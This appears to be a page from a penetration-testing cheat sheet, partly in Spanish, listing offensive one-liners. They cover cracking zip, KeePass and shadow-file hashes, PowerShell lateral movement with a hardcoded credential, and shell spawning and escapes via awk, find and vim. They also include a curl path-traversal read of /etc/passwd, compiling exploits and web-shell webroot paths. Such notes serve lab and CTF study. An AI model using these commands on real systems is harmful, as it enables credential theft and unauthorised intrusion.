Miscellaneaous

UTILS

Unzip encrypted zips

zip2john file > zip.file john zip.file -wordlist:/wordlistPath

Create user list with names

username-anarchy --input-file names.txt --select-format first,flast,first.last,firstl > usernames.txt

Kepass Master Password decode

keepass2john data.kdbx > hash.txt

DECODE BASE64

echo -n "cadena" | base64 -d; echo

CRACK SHADOW TXT

We need the passwd and the shadow file

unshadow passwd.txt shadow.txt > unshadowed.txt

CMD Lateral Movement

$user = "machineName\user"
$password = ConvertTo-SecureString "butterfly!#1" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $password)

Invoke-Command -Credential $cred -ComputerName SNIPER -ScriptBlock { whoami }

TTY Treatment

Para poder tener una terminal interactiva debemos seguir estos pasos:

Una vez ganamos acceso al sistema añadimos el siguiente comando:

script /dev/null -c bash

CTRL + Z
Ponemos el siguiente comando:

stty raw -echo; fg

Reseteamos el xterm

reset xterm

Exportamos variables TERM y BASH

export TERM=xterm
export SHELL=bash

Ajustamos el tamaño de la ventana. Para esto deberemos saber el tamaño de nuestra terminal con el comando:

stty size

stty rows x columns y

Upgrade Powershell to pty

https://github.com/antonioCoco/ConPtyShell

Spawning Interactive Shells

/bin/sh -i

/bin/sh -i

Perl

perl —e 'exec "/bin/sh";'

Ruby

ruby: exec "/bin/sh"

Lua

lua: os.execute('/bin/sh')

AWK

awk 'BEGIN {system("/bin/bash")}'

Find

find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
find . -exec /bin/sh \; -quit

VIM

vim -c ':!/bin/sh'

Vim escape

vim
:set shell=/bin/sh
:shell

CURL

Verbose output

curl -v http://<DOMAIN>

POST Method

curl -X POST http://<DOMAIN>

PUT Method

curl -X PUT http://<DOMAIN>

Use --path-as-is to handle /../ or /./ in the given URL

curl --path-as-is http://<DOMAIN>/../../../../../../etc/passwd

File Upload

curl -F myFile=@<FILE> http://<RHOST>

Detect if CMD or Powershell is used

We can use a handy snippet, published by PetSerAl that displays "CMD" or "PowerShell" depending on where it is executed.

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell

Compile an exploit

i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe
gcc shocker.c -o shocker

Run binaries in Linux

sudo wine exploit.exe

Web shell paths

Web Server

Default Webroot

Apache

/var/www/html/

Nginx

/usr/local/nginx/html/

IIS

c:\inetpub\wwwroot|

XAMPP

C:\xampp\htdocs|

Default Credentials Search

pip3 install defaultcreds-cheat-sheet
creds search apache
creds search mysql

Automated wordlist generator

We can manually create our list(s) or use an automated list generator such as the Ruby-based tool Username Anarchy to convert a list of real names into common username formats.

./username-anarchy -i <wordlist>

PreviousMetasploit NextUseful Files

Last updated 3 months ago

hashtagUTILS

hashtagUnzip encrypted zips

hashtagKepass Master Password decode

hashtagDECODE BASE64

hashtagCRACK SHADOW TXT

hashtagCMD Lateral Movement

hashtagTTY Treatment

hashtagUpgrade Powershell to pty

hashtagSpawning Interactive Shells

hashtagCURL

hashtagDetect if CMD or Powershell is used

hashtagCompile an exploit

hashtagRun binaries in Linux

hashtagWeb shell paths

hashtagDefault Credentials Search

hashtagAutomated wordlist generator